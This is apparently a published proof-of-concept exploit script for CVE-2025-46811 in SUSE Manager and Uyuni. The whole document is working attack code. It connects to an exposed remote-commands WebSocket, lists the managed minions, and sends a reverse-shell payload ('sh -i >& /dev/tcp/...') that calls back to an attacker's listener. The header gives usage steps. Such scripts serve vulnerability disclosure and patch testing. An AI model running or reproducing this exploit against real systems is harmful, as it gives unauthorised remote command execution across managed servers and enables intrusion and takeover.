# Exploit Title: SUSE Manager 4.3.15 - Code Execution
# Date: 29.01.2026
# Exploit Author: Wiktor Maj
# Vendor Homepage: https://www.uyuni-project.org/
# Software Link: https://github.com/uyuni-project/uyuni
# Version: Uyuni 2025.05, SUSE Manager 5.0.4, SUSE Manager 4.3.15
# Tested on: Debian 12 (bookworm), Python 3.11.2 with websocket-client 1.9.0
# CVE: CVE-2025-46811

# Sends a reverse shell payload to the vulnerable WebSocket of either SUSE Manager or Uyuni.
# Set up a listener session in a separate terminal.
# After the payload is sent, switch to your listener terminal to check if a shell pops up.
# Example:
# python3 cve-2025-46811.py --ip 192.168.10.126 --port 443 --host-ip 192.168.10.113 --host-port 9001 --ssl


#### PROGRAM CONSTRAINTS ####
PAYLOAD = f"sh -i >& /dev/tcp/HOST_IP/HOST_PORT 0>&1"  # reverse shell payload, HOST_IP and HOST_PORT will be substituted with CLI args
CONNECTION_RETRIES = 4  # number of connection attempts
CONNECTION_DELAY_BETWEEN_RETRIES = 15  # seconds
WEBSOCKET_TIMEOUT = 10  # seconds
##############################

import argparse
import json
import socket
import ssl
import sys
import time
import websocket


def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(description="Implementation of CVE-2025-46811 exploit for SUSE Manager & Uyuni.", add_help=False)
    parser.add_argument("-h", "--help", action="help", default=argparse.SUPPRESS, help="Display this help text and exit.")
    parser.add_argument("--ip", required=True, help="Victim IPv4 or hostname.")
    parser.add_argument("--port", type=int, default=443, help="Victim port (default: 443).")
    parser.add_argument("--host-ip", required=True, help="Attacker host IPv4 or hostname.")
    parser.add_argument("--host-port", type=int, required=True, help="Attacker host port.")
    group = parser.add_mutually_exclusive_group()
    group.add_argument("--ssl", dest="ssl", action="store_true",
                       help="Use SSL/TLS for the WebSocket connection (default).")
    group.add_argument("--no-ssl", dest="ssl", action="store_false",
                       help="Disable SSL/TLS and use plaintext WebSocket.")
    parser.set_defaults(ssl=True)
    return parser.parse_args()


def resolve_target(hostname: str) -> str:
    return socket.gethostbyname(hostname)


def receive_preview_minions_message(websocket_connection: websocket.WebSocket) -> str:
    while True:
        try:
            message = websocket_connection.recv()
            if message:
                print("Received:", message)
                if isinstance(message, bytes):
                    message = message.decode("utf-8", errors="replace")
                return message
        except websocket.WebSocketTimeoutException as exception:
            raise RuntimeError("Failed to receive preview minions message") from exception


def decode_preview_minions_message(message: str) -> list[str]:
    try:
        preview_output = json.loads(message)
    except json.JSONDecodeError as exception:
        raise RuntimeError("Preview response is not valid JSON") from exception
    if (
        isinstance(preview_output, dict)
        and isinstance(preview_output.get("minions"), list)
        and preview_output["minions"]
        and all(isinstance(entity, str) for entity in preview_output["minions"])
    ):
        return preview_output["minions"]
    raise RuntimeError("Preview response expected non-empty 'minions' list")


def receive_preview_minions(websocket_connection: websocket.WebSocket) -> list[str]:
    message = receive_preview_minions_message(websocket_connection)
    minions = decode_preview_minions_message(message)
    return minions


def select_minion(minions: list[str]) -> str:
    print("Available minions:")
    for minion_id, minion_name in enumerate(minions, start=1):
        print(f"{minion_id}) {minion_name}")
    prompt = "Select minion number (default is '1', or 'c' to cancel): "
    while True:
        choice = input(prompt).strip()
        if choice == "":
            return minions[0]
        if choice.lower() == "c":
            print("No minion selected. Exiting.")
            sys.exit(0)
        if choice.isdigit():
            index = int(choice)
            if 1 <= index <= len(minions):
                return minions[index - 1]
        print("Invalid selection.")


def connect_to_websocket(target_ip: str,
                         port: int,
                         use_ssl: bool,
                         sslopt: dict,
                     ) -> websocket.WebSocket:
    scheme = "wss" if use_ssl else "ws"
    try:
        return websocket.create_connection(
            f"{scheme}://{target_ip}:{port}/rhn/websocket/minion/remote-commands",
            timeout=WEBSOCKET_TIMEOUT,
            sslopt=sslopt,
        )
    except ssl.SSLError as exception:
        if "WRONG_VERSION_NUMBER" in str(exception):
            raise RuntimeError("Websocket seems to be unsecured, try with --no-ssl") from exception
        raise
    except websocket.WebSocketBadStatusException as exception:
        if exception.status_code == 400:
            raise RuntimeError("Websocket seems to be secured, try with --ssl") from exception
        raise
    except TimeoutError as exception:
        raise RuntimeError("Websocket is likely under firewall") from exception


def get_minions(target_ip: str,
                port: int,
                use_ssl: bool,
            ) -> tuple[websocket.WebSocket, list[str]]:
    sslopt = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
    for attempt in range(1, CONNECTION_RETRIES + 1):
        websocket_connection = None
        try:
            websocket_connection = connect_to_websocket(target_ip, port, use_ssl, sslopt)
            websocket_connection.send(json.dumps({"preview": True, "target": "*"}))
            minions = receive_preview_minions(websocket_connection)
            return websocket_connection, minions
        except (
            websocket.WebSocketTimeoutException,
            websocket.WebSocketConnectionClosedException,
        ):
            if websocket_connection is not None:
                websocket_connection.close()
            if attempt == CONNECTION_RETRIES:
                break
        time.sleep(CONNECTION_DELAY_BETWEEN_RETRIES)
    raise RuntimeError("Target websocket is not vulnerable or not reachable")


def send_payload(websocket_connection: websocket.WebSocket, target: str) -> None:
    payload = PAYLOAD.replace("HOST_IP", args.host_ip).replace("HOST_PORT", str(args.host_port))
    websocket_connection.send(json.dumps({"preview": False, "target": target, "command": payload}))


if __name__ == "__main__":
    args = parse_args()
    websocket_connection = None
    try:
        websocket_connection, minions = get_minions(
            target_ip=resolve_target(args.ip),
            port=args.port,
            use_ssl=args.ssl,
        )
        selected_minion = select_minion(minions)
        send_payload(websocket_connection, selected_minion)
        print("Payload sent, closing.")
    finally:
        if websocket_connection is not None:
            websocket_connection.close()